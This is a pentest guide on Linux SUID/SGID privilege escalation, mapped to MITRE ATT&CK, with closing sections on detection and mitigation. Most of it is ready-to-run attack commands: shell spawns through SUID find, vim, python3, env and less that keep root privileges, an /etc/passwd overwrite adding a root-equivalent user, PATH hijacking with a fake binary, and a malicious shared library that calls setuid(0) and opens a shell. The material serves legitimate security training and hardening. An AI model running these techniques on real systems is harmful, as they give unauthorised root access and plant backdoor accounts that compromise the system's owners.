SUID/SGID Exploitation

Overview

The Set User ID (SUID) bit allows a binary to execute with the file owner's privileges, regardless of who runs it. When set on a root-owned binary, any user executing it runs as root. SGID (Set Group ID) works similarly for group privileges. Non-standard SUID/SGID binaries — custom scripts, outdated tools, or misconfigured utilities — are common privilege escalation vectors.

Standard SUID binaries like passwd, ping, su, and mount are expected. The attack surface is non-standard entries — anything installed by administrators or applications.

ATT&CK Mapping

• Tactic: TA0004 - Privilege Escalation
• Technique: T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid

Prerequisites

• Shell access as a low-privileged user
• Ability to execute find to discover SUID/SGID binaries

Techniques

Discovery

# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find all SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Both SUID and SGID
find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null

# With details (owner, permissions)
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

Compare the results against known-safe SUID binaries. Anything unfamiliar is worth investigating. Cross-reference with GTFOBins for known exploitation techniques.

GTFOBins SUID Exploits

GTFOBins documents exploitation techniques for Unix binaries. When a SUID binary appears in GTFOBins, use the "SUID" section for the exact escalation command.

Common SUID escalation examples:

# find (SUID)
find . -exec /bin/sh -p \; -quit

# vim (SUID)
vim -c ':!/bin/sh -p'

# python3 (SUID)
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# bash (SUID) — requires -p to preserve effective UID
bash -p

# env (SUID)
env /bin/sh -p

# nmap (old versions with interactive mode, SUID)
nmap --interactive
# then: !sh

# cp (SUID) — overwrite /etc/passwd
cp /etc/passwd /tmp/passwd.bak
echo "root2:$(openssl passwd -1 password):0:0:root:/root:/bin/bash" >> /tmp/passwd.bak
cp /tmp/passwd.bak /etc/passwd

# less/more (SUID) — spawn shell from pager
less /etc/shadow
# then type: !/bin/sh

The -p flag is critical for bash and sh. Without it, bash drops the effective UID back to the real UID, negating the SUID escalation.

Custom SUID Binaries

Custom SUID binaries often call system utilities without full paths. This enables PATH manipulation:

# Identify what a custom SUID binary does
strings /path/to/suid-binary
ltrace /path/to/suid-binary 2>&1
strace /path/to/suid-binary 2>&1

# If the binary calls a command without a full path (e.g., "service" instead of "/usr/sbin/service"):
# 1. Create a malicious script with the same name
echo '#!/bin/bash' > /tmp/service
echo '/bin/bash -p' >> /tmp/service
chmod +x /tmp/service

# 2. Prepend /tmp to PATH
export PATH=/tmp:$PATH

# 3. Run the SUID binary — it calls our fake "service" as root
/path/to/suid-binary

Shared Library Injection

If a SUID binary loads shared libraries from writable paths:

# Check library dependencies
ldd /path/to/suid-binary

# Check for missing libraries
strace /path/to/suid-binary 2>&1 | grep "No such file"

# If a library is loaded from a writable directory, create a malicious replacement:
# malicious.c
# #include <stdlib.h>
# void _init() {
#     setuid(0);
#     system("/bin/bash -p");
# }

gcc -shared -fPIC -o /writable/path/libmissing.so malicious.c -nostartfiles
# Run the SUID binary — it loads our library
/path/to/suid-binary

/etc/passwd Write

If you can write to /etc/passwd (via SUID binary like cp, or writable permissions):

# Generate a password hash
openssl passwd -1 -salt xyz password123

# Add a root-equivalent user
echo 'newroot:$1$xyz$abc123hash:0:0:root:/root:/bin/bash' >> /etc/passwd

# Switch to the new user
su newroot
# Password: password123

Detection Methods

Network-Based Detection

• Not applicable — SUID exploitation is local to the compromised host

Host-Based Detection

• Monitor for changes to file permissions (SUID bit being set): auditctl -w /usr/bin/ -p wa
• Alert on new SUID binaries appearing in non-standard locations
• Monitor for unexpected root shell spawns from non-standard binaries
• File integrity monitoring (AIDE, OSSEC) to detect SUID changes

Mitigation Strategies

• Minimize SUID binaries — audit and remove SUID from any binary that does not strictly require it: chmod u-s /path/to/binary
• Mount with nosuid — mount user-writable partitions (/tmp, /home, /var/tmp) with the nosuid option in /etc/fstab
• Use capabilities instead — replace SUID with specific Linux capabilities (e.g., cap_net_raw for ping instead of SUID)
• Regular audits — periodically compare SUID binaries against a known-good baseline

References

Pentest Guides & Research

• GTFOBins
• PayloadsAllTheThings - Linux Privilege Escalation

MITRE ATT&CK

• T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid